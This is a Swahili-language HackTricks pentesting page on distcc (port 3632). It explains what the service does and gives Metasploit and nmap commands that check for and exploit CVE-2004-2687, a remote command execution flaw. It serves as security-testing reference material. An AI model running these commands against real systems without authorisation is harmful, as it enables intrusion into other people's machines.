hacktricks/network-services-pentesting/3632-pentesting-distcc.md

2.3 KiB

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Taarifa Msingi

Distcc ni chombo kinachoboresha mchakato wa uundaji kwa kutumia nguvu za usindikaji zilizotulia za kompyuta nyingine kwenye mtandao. Wakati distcc inapowekwa kwenye mashine, mashine hii inaweza kusambaza kazi zake za uundaji kwa mfumo mwingine. Mfumo huu wa mpokeaji lazima uwe unatekeleza daemani ya distccd na lazima awe na kompaila inayoweza kufanya kazi imewekwa ili iprocess nambari iliyotumwa.

Bandari ya chaguo: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Utekaji

Angalia ikiwa ina hatari ya CVE-2004-2687 ya kutekeleza nambari za aina yoyote:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Sidhani shodan inagundua huduma hii.

Vyanzo

Mchapishaji: Álex B (@r1p)